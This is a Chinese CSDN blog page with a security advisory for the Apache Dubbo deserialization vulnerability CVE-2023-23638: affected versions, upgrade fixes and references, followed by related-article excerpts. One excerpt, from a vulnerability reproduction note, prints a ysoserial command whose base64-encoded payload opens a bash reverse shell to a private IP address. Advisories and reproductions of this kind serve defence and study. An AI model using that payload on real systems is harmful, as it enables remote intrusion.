漏洞预警|Apache Dubbo 存在反序列化漏洞

最新推荐文章于 2024-08-11 21:12:10 发布
最新推荐文章于 2024-08-11 21:12:10 发布
阅读量730 收藏 1
点赞数
文章标签: dubbo java 分布式
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LJQClqjc/article/details/129428965
版权

棱镜七彩安全预警

近日网上有关于开源项目Apache Dubbo 存在反序列化漏洞,棱镜七彩威胁情报团队第一时间探测到,经分析研判,向全社会发起开源漏洞预警公告,提醒相关安全团队及时响应。

项目介绍

Apache Dubbo 是一款 RPC 服务开发框架,用于解决微服务架构下的服务治理与通信问题,官方提供了 Java、Golang 等多语言 SDK 实现。使用 Dubbo 开发的微服务原生具备相互之间的远程地址发现与通信能力, 利用 Dubbo 提供的丰富服务治理特性,可以实现诸如服务发现、负载均衡、流量调度等服务治理诉求。Dubbo 被设计为高度可扩展,用户可以方便的实现流量拦截、选址的各种定制逻辑。

项目主页

https://cn.dubbo.apache.org/

代码托管地址

https://github.com/apache/dubbo

CVE编号

CVE-2023-23638

漏洞情况

Apache Dubbo 是一款 RPC 服务开发框架,用于解决微服务架构下的服务治理与通信问题,官方提供了 Java、Golang 等多语言 SDK 实现。该项目受影响版本存在反序列化漏洞,由于Dubbo在序列化时检查不够全面,当攻击者可访问到dubbo服务时,可通过构造恶意请求绕过检查触发反序列化,执行恶意代码。

受影响的版本

org.apache.dubbo:dubbo-common@[3.0.0, 3.0.14)

org.apache.dubbo:dubbo-qos@[3.1.0, 3.1.6)

org.apache.dubbo:dubbo-common@[2.7.0, 2.7.22)

修复方案

将组件 org.apache.dubbo:dubbo-common 升级至 3.0.14 及以上版本

将组件 org.apache.dubbo:dubbo-qos 升级至 3.1.6 及以上版本

将组件 org.apache.dubbo:dubbo-common 升级至 2.7.22 及以上版本

链接地址:

NVD - CVE-2023-23638

类检查机制 | Apache Dubbo

Add SerializeCheckStatus command (#11434) · apache/dubbo@6e5c1f8 · GitHub

Add serializable check for pojo (#11431) · apache/dubbo@ce3b0e2 · GitHub

Add serializable check for pojo (#11430) · apache/dubbo@4f664f0 · GitHub

查看更多安全漏洞:快速查询安全漏洞 | 柒巧板

棱镜七彩
关注
游戏跨服架构进化之路
流子的专栏
03-02 1万+
1.背景 虽然游戏市场竞争激烈,产品格局变动较大,但游戏产业一直处于稳步增长阶段,无论是在端游,页游,手游还是已经初露端倪的H5游戏。可以预见,游戏类型中,MMOARPG游戏仍然会是引领市场的主流趋势,贡献着大部分流水,市场上也仍然在不断涌现精品。研发团队对MMO游戏的探索从来未间断过,从付费模式的改变,到题材多元化,次时代的视觉效果,更成熟的玩法及数值体系,本文主要针对跨服玩法上的探索和...
Dubbo反序列化漏洞分析集合
AS011x的博客
09-09 3802
调用相应的反序列化函数对数据流进行反序列化操作。,如果不满足则直接抛出异常。若pojo为Map实例,则从pojo(也就是一开始的第三个参数)获取key为“class”的值,并通过反射得到class所对应的类type,再判断对象的类型进行下一步处理。在之前的分析中我们知道了这个方法是用来获取数据体中的一些信息用的,其中一种利用方式就是通过在读取version的时候,调用readUTF方法,跟进。主要是通过获取tag位,进行相应的处理,但是这里关键的就是,当这里不是一个String类型的时候,将会抛出异常。
Apache Dubbo反序列化漏洞
蚁景网安学院
11-18 1515
Apache Dubbo反序列化漏洞复现及利用!
漏洞复现-Apache Dubbo反序列化漏洞(CVE-2023-23638)
最新发布
玄道的网安博客
08-11 308
GenericFilter 将根据客户端提供的接口名、方法名、方法参数类型列表,根据反射机制获取对应的方法,再根据客户端提供的反序列化方式将参数进行反序列化成 pojo 对象。遍历 Map 中所有的 key, 并尝试获取与 key 对应的 setter 或 Field, 然后赋值因为上面的过程会同时获取可能的 setter 和 Field, 然后赋值, 所以我们基本上可以控制任何类的任何属性 (即使它没有对应的 setter)1、关闭对公网开放的Dubbo服务端端口,仅允许可信任的IP访问。
漏洞预警Apache Dubbo再现反序列化漏洞,腾讯安全已支持全方位检测防护
wzl_540的专栏
03-15 1300
(2)若直接编译、使用jar包构建项目,可查看jar包版本判断是否可能受漏洞影响(jar包全名:dubbo-x.x.x.jar / dubbo-common-x.x.x.jar,其中dubbo / dubbo-common为包名,x.x.x为版本)。(1)若使用maven构建项目,可在pom.xml等文件中查看引用的maven包版本(maven groupId: org.apache.dubbo,artifactId: dubbo / dubbo-common)。
Apache Dubbo 存在反序列化漏洞(CVE-2023-23638)
murphysec的博客
03-09 4476
Apache Dubbo 是一款轻量级 Java RPC 框架 该项目受影响版本存在反序列化漏洞,由于Dubbo在序列化时检查不够全面,当攻击者可访问到dubbo服务时,可通过构造恶意请求绕过检查触发反序列化,执行恶意代码
mysql漏洞如何打补丁_漏洞治理(漏洞情报)调研报告
weixin_39851457的博客
11-23 1446
君哥有话说漏洞运营和安全资产运营是快速收敛攻击面的最有效的两个措施,需要企业安全建设负责人首要关注,并投入大量精力确保漏洞管理的各项细节落地,包括漏洞发现、漏洞推修、漏洞验证等各个环节,这里面的细节很多,比如覆盖率、漏扫范围、漏扫技术细节(未登陆扫描、被动式扫描)、漏扫类别、漏洞修复方式、不能修的漏洞补偿性措施、漏洞考核、避免历史漏洞重现等等。推荐泉哥的一本书《漏洞战争:软件漏洞分析精要...
代码审计-dubbo admin <=2.6.1远程命令执行漏洞
weixin_47208161的博客
02-12 6377
前置输入材料安全目标和需求架构分析供应链安全源代码审查依赖结构矩阵(Dependency Structure Matrices,DSM)数据流信任边界数据存贮威胁列表otter mana...
开发者测试(4)-采用精准测试工具对dubbo微服务应用进行测试
teststars的博客
12-03 544
简介:本文主要目的是把现今主流的Dubbo框架项目和精准测试进行对接,通过精准测试的数据穿透、数据采集、测试用例与代码的双向追溯、数据分析等一系列精准测试的特有功能达到对项目质量的保证。   本次环境搭建分为基础环境准备、Dubbo环境搭建、精准测试环境搭建、精准测试与Dubbo环境对接等一整套完整的配置过程,用户可以通过下图中的流程图确认自己所部署过程中进行到的阶段点,从而排查部署中可能遇见的问...
使用RocketMQ 做Spring Cloud异步场景分布式事务
xhbzl的博客
09-07 734
专注分享:(高可用、高并发、高性能及分布式、Jvm性能调优、Spring源码,MyBatis,Netty,Redis,Kafka,Mysql,Zookeeper,Tomcat,Docker,Dubbo,Nginx等技术...)Spring Cloud Stream 是一个构建消息驱动的框架,通过抽象的定义实现应用与MQ消息队列之间的解耦,目前支持 RabbitMQ 、 kafka 和 RocketMQ。上下游,而构建异步架构最常用的手段就是使用 消息队列(MQ) ,那异步架构怎样才能实现数据一致性呢?
Apache Dubbo 高危漏洞
yes
01-24 2155
你好,我是yes。 前不久 Log4j2 的漏洞不是闹得沸沸扬扬吗,上百个应用更新的那一天,还记忆犹新。 今天又看到了个 Apache Dubbo 的高危漏洞通告,好家伙一看这版本,我们的应用有漏洞… 其实这个漏洞爆出来已经很多天了,影响面没 Log4j2 大,所以没那么“火”,不过也是个高危漏洞。 又是一个可以远程代码执行的漏洞漏洞的类型是因为反序列化的问题。 从 360网络安全响应中心官网来看,1.14 号就通告了。 对这个漏洞的评定结果如下: 可以看到,还是属于影响比较严重的漏洞。 具体是因为
注意,Dubbo 存在高危反序列化漏洞
Java知音
06-25 683
精彩推荐一百期Java面试题汇总SpringBoot内容聚合IntelliJ IDEA内容聚合Mybatis内容聚合以下内容转载自安全客,原文链接:https://www.anquank...
Dubbo反序列化漏洞,网易轻舟提供全方位解决方案
网易数帆社区博客
02-18 2476
2020年2月13日,Apache Dubbo官方发布了一条反序列化漏洞漏洞编号:CVE-2019-17564)的通告,漏洞等级中危。轻舟微服务虽然支持Apache Dubbo,但由于在架构设计上的优化,可保证用户不会受此次漏洞影响。 漏洞原理及影响范围 Apache Dubbo支持多种通信协议,官方默认为Dubbo协议,当用户选择HTTP协议进行通信时,攻击者可以利用该漏洞在目标网站上远程...
shrio反序列漏洞修复_提醒:Apache Dubbo存在反序列化漏洞
weixin_39583521的博客
12-01 157
背景:近日监测到Apache Dubbo存在反序列化漏洞(CVE-2019-17564),此漏洞可导致远程代码执行。Apache Dubbo是一款应用广泛的高性能轻量级的Java RPC分布式服务框架。鉴于漏洞危害较大,建议尽快更新软件。情报通告:威胁程度:个人风险评级:低危企业风险评级:中危情报风险预警:对公司影响等级为中,对使用Apache Dubbo相应版本的企业均有被攻击的风险。情报描述:...
Apache Dubbo 被曝出“高危”远程代码执行漏洞
Java后端技术
06-26 813
往期热门文章:1、《往期精选优秀博文都在这里了!》2、自从用完Gradle后,有点嫌弃Maven了!速度贼快!3、老大吩咐的可重入分布式锁,终于完美的实现了~4、多线程到底该设置多少个线...
关于Apache Dubbo反序列化漏洞(CVE-2023-23638)的预警提示与对应的Zookeeper版本
u011236069的博客
06-27 1936
Apache官方发布安全公告,修复了Apache Dubbo中的一个反序列化漏洞(CVE-2023-23638)。由于Apache Dubbo安全检查存在缺陷,导致可以绕过反序列化安全检查并执行反序列化攻击,成功利用该漏洞可在目标系统上执行任意代码。Apache Dubbo 2.7.x 版本
Apache Dubbo(CVE-2019-17564) Java反序列化漏洞复现笔记(最详细版本
精品博客,你值得一看~
08-25 1376
java -jar ysoserial-master-2874a69f61-1.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4NC4xMzYvODg4OCAwPiYx}|{base64,-d}|{bash,-i}" > 2.poc #生成反弹shell的脚本2.poc ,这里将刚刚复制的内容贴到双引号里面执行。
dubbo反序列化导致Timestamp丢失时分秒,怎么办
06-02
这个问题是由于dubbo默认使用了Hessian2进行序列化和反序列化,而Hessian2对于java.sql.Timestamp类型的序列化存在问题,会导致反序列化后的对象中Timestamp的时分秒丢失。解决这个问题的方法是使用其他的序列化方式,比如使用Java的标准序列化方式或者使用JSON进行序列化和反序列化。具体的做法如下: 1. 使用Java的标准序列化方式 在dubbo的配置文件中,将序列化方式改为Java自带的序列化方式: ``` <dubbo:protocol name="dubbo" serialization="java" /> ``` 2. 使用JSON进行序列化和反序列化dubbo的配置文件中,将序列化方式改为fastjson或者jackson: ``` <dubbo:protocol name="dubbo" serialization="fastjson" /> ``` 或者 ``` <dubbo:protocol name="dubbo" serialization="jackson" /> ``` 其中,fastjson和jackson都是常用的JSON序列化库。使用JSON进行序列化和反序列化可以避免Hessian2对于Timestamp的序列化问题,同时还可以提高序列化和反序列化的性能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值